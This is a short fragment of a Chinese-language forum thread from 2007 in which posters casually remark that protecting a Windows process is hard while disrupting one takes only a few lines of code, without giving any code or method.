引用第16楼cardmagic于2007-01-18 14:15发表的“”: 哦? csrss里搞个东西很困难~ 不如Hack掉is的界面~ |
|
|
|
19楼#
发布于:2007-01-18 18:23
引用第18楼killvxk于2007-01-18 16:29发表的“”: 几行代码而已,很简单的...对大部分东西都有效.不过也没什么意思,因为可以搞进程的地方太多太多了. 强力而有效的保护进程正常运行挺难,但是搞破坏太容易了. |
|
|
上一页
下一页